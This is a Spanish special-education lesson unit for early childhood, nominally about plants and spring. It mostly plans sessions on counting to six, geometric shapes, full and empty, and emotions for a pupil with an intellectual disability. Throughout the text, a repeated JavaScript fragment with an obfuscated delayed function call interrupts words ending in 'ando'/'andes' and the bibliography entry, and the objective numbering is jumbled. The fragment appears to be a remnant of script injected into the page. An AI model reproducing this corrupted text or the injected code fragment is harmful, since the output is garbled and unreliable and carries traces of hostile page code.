UNIDAD DE INTERVENCIÓN DE PEDAGOGÍA TERAPÉUTICA: “ ¡ME GUSTAN LAS PLANTAS Y LA PRIMAVERA!“

Autora: Mª Ángeles Cortés Bernabé

JUSTIFICACIÓN Y CONTEXTO

         El eje central de esta unidad es conocer las principales características de la  primavera y de las plantas (cuidado, partes, crecimiento, identificar frutas y hortalizas, etc.). Se enmarca dentro del 3er trimestre y su temporalización dependerá del ritmo de aprendizaje del alumno, aunque la programación sea quincenal, con 4 sesiones semanales de 50 minutos. Se trabajan 2 sesiones dentro del aula ordinaria y 2 en el aula de apoyo.

         En esta unidad tratamos de que el alumno, que presenta Deficiencia Psíquica) interactúe con los demás compañeros, los conozca y desarrolle la máxima autonomía, trabajandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando algunas actividades dentro del aula ordinaria.


          Está adaptada al 2º ciclo de Ed. Infantil.

ELEMENTOS DE LA U.D.

I. OBJETIVOS.

  1. Señalar la correspondencia número-objetos.
  2. Escribir  y reconocer los dígitos y grafías de los números 1, 2, 3, 4, 5 y 6.
  3. 5.  Utilizar las posibilidades de la forma de representación matemática, para describir algunos objetos y situaciones del entorno, características y propiedades. Conceptos: lleno, vacío y mitad.
  4. 6. Identificar las formas geométricas: círculo, cuadrado, triángulo y rectángulo.

En cuanto al Programa de Modificación de Conducta:


      7. Expresar sentimientos y comunicarse mediante gestos.

II. CONTENIDOS.  

- Números 1, 2, 3, 4, 5 y 6.

- Formas geométricas: círculo, cuadrado, triángulo y rectángulo.

- Cuantificadores lleno, vacío y mitad.

- Alegría, tristeza, cariño y amistad.

- Utilización de la serie numérica para contar elementos de la realidad.

- Observación y exploración de objetos para descubrir su forma.

- Exploración y verbalización de los cuantificadores: lleno, vacío y mitad.

- Reconocimiento de figuras entre varias dadas.

- Escritura de los números del 1 al 6.

- Expresión de sentimientos positivos hacia los demás.

- Gusto por explorar objetos y compararlos.

- Interés por contar objetos y valorar la utilidad de los números.

- Disfrute con la exploración y verbalización de los cuantificadores.

- Interés por demostrar los sentimientos positivos hacia los demás.

 Temas transversales:

 Se trabajará principalmente la educación ambiental y la educación para la paz.

 

III. CRITERIOS DE EVALUACIÓN

-Reconocimiento y escritura de la grafía de los números del 1 al 6.

  – Recuento de objetos hasta 6 y correspondencia número-objetos.

- Reconocimiento del círculo, cuadrado, triángulo y rectángulo.

- Asociación de los cuantificadores lleno, vacío y mitad a hechos reales.

- Abstracción de conceptos trabajándolos en el plano.

IV. ACTIVIDADES

Primera Sesión: (En el aula de Apoyo)


1. Título: “ Las plantas del jardín “:

    ¿Cómo se realiza? Observación y debate de la lámina de la U.D., intentamos que se familiarice con la U.D. y  potenciar así su autonomía.  Temporalización Nos llevará 5 minutos.

2.  Titulo: “Lleno o vacío”:

¿Cómo se realiza? El alumno observará un cubo lleno de arena y otro vacío, serán de diferente color. Observará como vaciandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el contenido del cubo lleno en el vacío, cambian sus denominaciones.

Dirá cosas de la casa, el colegio… que se llenan y vacían con distintos contenidos (la bañera, el lapicero…) Que juegue con cosas a llenarlas y vaciarlas. Luego, de su propio cuerpo: la boca se llena, está lleno después de comer… Temporalización: 10 minutos


 

3. Titulo: “Del 1 al 6”:

     ¿Cómo se realiza? : Manipular libremente material discontinuo, bolas, bloques lógicos y otros objetos. Entonces  empezamos a contar uno a uno. Paralelamente debemos iniciarles en la numeración escrita, asociandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando símbolo con cantidad.

- Dibujar en la pizarra los números del 0 al 6 grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes, y repasarlos con tizas de colores, indicandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el punto de inicio y el sentido del trazado correcto de cada número.

- Nombrar objetos de la clase para que los alumnos busquen y digan cuántos hay (debe haber entre 1 y 6 objetos). Por ejemplo, ventanas, puertas, armarios, estanterías, etc.

- Realizamos una ficha en la que tienen que repasar los números del 1 al 6 y colorear dibujos en cada número con esa cantidad. Temporalización: Esta actividad nos llevará unos 20 minutos.


 

4.  Título: “Las formas geométricas”:

            ¿Cómo se realiza? En el ordenador los últimos 10 minutos de la clase utilizamos el programa JClic del linex-cole. (En Infantil – Matemáticas – Formas geométricas).

 

 

Segunda Sesión: (En el aula de Ordinaria)

5. Título: Psicomotricidad”:


¿Cómo se realiza? Con la especialista de E. Física (la P.T. se sitúa al lado del alumno, procurandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando su participación y favoreciendo su autonomía). Hacen un círculo. Luego, la maestra va dandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando órdenes que la P.T. apoya con su propio ejemplo. Son del tipo:

- “Caminaréis en fila por la línea del cuadrado dibujado en el suelo con tiza. Después de la palmada, formaréis grupos de cuatro y con vuestros cuerpos dibujaréis en el suelo un cuadrado”

- En corro con las fichas de los Bloques Lógicos, buscarán los círculos y cuadrados.

- Luego intentarán hacer selecciones atendiendo a dos criterios: Ej: azules y cuadrados.

- Enseñamos el dibujo de formas geométricas. Deberán buscar materiales del  que tengan esas.

- Con objetos con las formas geométricas (por ej., un sobre, posavasos circular, bandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anderín triangular, servilleta cuadrada…) introducidos en una bolsa, pedir a los niños que, por turnos, cierren los ojos y cojan uno de esos objetos. Deberán reconocer la forma y decir su nombre.

Tercera Sesión: (En el aula de Apoyo).

6. Título: “Lo hago yo solo”:

      Seleccionaremos algunas de las actividades de la sesión anterior de la clase ordinaria para que las realice el alumno, pero se retirarán las ayudas tratandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando de favorecer la seguridad del niño. Temporalización: Primeros 15 minutos de la clase.


 

7. Título: “Lo lleno y lo vacío”:

¿Cómo se realiza? El niño jugará a llenar y vaciar cosas de la clase (un lapicero, su estuche… verbalizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando las acciones. Temporalización: 5 minutos.

 

8. Título: “El agua y la arena” :

   ¿Cómo se realiza? Con 3 vasos de plástico: uno lleno hasta arriba de agua, otro hasta la mitad de arena y otro vacío. Los observará, verbalizará y diferenciará. Llevará la experiencia a la pizarra, coloreandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando 3 vasos: uno con tiza azul (agua), otro con tiza (arena) y otro vacío.

- Después realizará una ficha en la que deberá pegar un gomet en los dibujos de objetos que estén vacíos. Temporalización: 15 minutos.


 

9. Título:La oca”:

¿Cómo se realiza? Jugaremos al tradicional juego de la oca. Irá relacionandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el número de puntos con las casillas que tiene que contar. Temporalización: Últimos 10 minutos para una primera aproximación.


Cuarta Sesión: (En el aula Ordinaria)

10. Título: “Plantamos una maceta”:

   ¿Cómo se realiza?: Cada niño/a realizará su propia plantación . Observaremos diariamente los cambios: fechas de plantación, germinación, crecimiento… Realizaremos un fichero de seguimiento. Temporalización: Primeros 30 minutos de la clase.

11. Título: “¿Cuántas flores hay?”:

   ¿Cómo se realiza?: Realizaremos una ficha donde habrá pintadas una maceta con una flor y debajo el número 1 punteado, otra con el número 2 y así hasta llegar a la maceta que contenga 6 flores. Repasará el número y coloreará las que contengan el número 2, 4 y 6. La del resto de los alumnos será igual pero con sumas sencillas. Temporalización: 15 min.


 

 Quinta Sesión: (En el aula de Apoyo)


12. Título: “Gcompris”:

   ¿Cómo se realiza?: En la Suite Educativa Gcompris del Linex-cole y dentro de las actividades de matemáticas, concretamente Cuenta elementos (el alumno deberá contar frutas, bolas… y unirlas a su número correspondiente) y Dados. Temporalización: 25 minutos.

13. Título: “Llenamos los números”:

   ¿Cómo se realiza?: En una lámina con números, indicaremos cuáles se pueden llenar, porque están cerrados. Después los llenará pegandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando bolitas de papel. Ejemplo: 0,6,9. Temporalización: 15 minutos.

14 Titulo: “La oca”:

¿Cómo se realiza? Repasaremos el juego los últimos 10 minutos, para luego poder compartir el juego con el resto de compañeros.

Sexta Sesión: (En el aula de Ordinaria)


15. Título: “Repasamos dentro-fuera” :

¿Cómo se realiza? Con la maestra de E. Física. Hacen todos un círculo. La maestra va dandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando órdenes que la P.T. apoya con su propio ejemplo: “manos DENTRO del jersey” ,“sacar un balón fuera de clase; meterlo…”, colocados alrededor de cuatro o cinco aros el niño que  nombre colocará dentro del aro  la cantidad de niños que se le indique. Temporalización: 15 minutos.

16. Título: “El gato y el ratón”:

¿Cómo se realiza? Dos son gatos, están dormidos y los demás ratones, tendrán que coger los quesos sin que se despierte porque si no los caza. Temporalización: 15 minutos.

 

17. Título: “Cantamos” :

             ¿Cómo se realiza? Con canciones reforzamos el esquema corporal: “Dedo gordo”, “Saco una manita” y “Mi cuerpo”. Procuramos la participación de todos. Temporalización: 10 minutos.

18. Título: “La oca”:

¿Cómo se realiza? Completandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando los 50 minutos, aprovechandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el tradicional juego de la oca.

Séptima Sesión: (En el aula de Apoyo)


19. Título: “Lo hago yo solo”:

Seleccionamos actividades de la sesión anterior de la clase ordinaria para que las realice el alumno  pero, se retirarán las ayudas para favorecer su seguridad. Temporalización: 10 minutos. 

 

20. Título: “Adivina, Adivinanza”:

¿Cómo se realiza?: ¿Qué regleta tengo si su equivalencia es …… blancas? Se le premiará con regletas blancas y si falla se le van quitandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando. Temporalización: 10 minutos.          

 

21. Título: A reír y llorar con la forma”:

   ¿Cómo se realiza?: Con los bloques lógicos determinaremos la forma para reír, llorar y silencio; dos para silencio y las otras para reír y llorar. Se visualiza una forma y el alumno deberá llorar, reír o silencio según lo establecido. Temporalización: 10 minutos.

 

22. Título: “Las botellas llenas”:

¿Cómo se realiza?: En una ficha con botellas llenas y vacías darle la consigna de que coloree aquellas que están llenas. Temporalización: 15 minutos.


Octava Sesión: (En el aula de Ordinaria)


23. Título: “¡Eres estupendo!”:

   ¿Cómo se realiza?: Se situarán en círculo. Uno de ellos cogerá una pelota diciendo una cualidad positiva del compañero que tiene al lado y le pasará luego la pelota y así sucesivamente 

 

24. Título: “El cuento de las emociones”:

            ¿Cómo se realiza?: A través de narración de un cuento de dos hermanos identificarán  emociones. Sentamos a los niños en círculo y después del cuento hacemos preguntas.

 

25. Título: “Las cuatro esquinitas”:

¿Cómo se realiza?: Varios alumnos se situarán en 4 gomets del suelo y otro en medio. Los que están en los gomets se intercambian posiciones y el del centro ocupará alguna esquina libre. Los cambios deberán ser a la vez mediante comunicación gestual.

METODOLOGÍA:

               Será de tipo globalizadora, significativa, activa, participativa y lúdica, partiendo del nivel de desarrollo y necesidades del alumno. Nos coordinaremos con el tutor y maestro de Ed. Física, para hacer coincidir la temporalización.


 

MATERIALES:

         Señalar las TICs, el linEx – Colegios, así como materiales propios del aula: bloques lógicos, fichas, regletas, láminas, cubos, arena, agua, el juego de la oca, macetas…


 

PROCEDIMIENTOS DE EVALUACIÓN.         

               Utilizaremos la observación directa, análisis de tareas, preguntas orales y comprobación de trabajos escritos. Será: continua, global y formativa. Analizaremos el grado de consecución de los  criterios de evaluación.


BIBLIOGRAFÍA:

  • Garrido Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andivar, J. (1997). “Programación de actividades para Educación Especial“. Madrid, Editorial CEPE.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.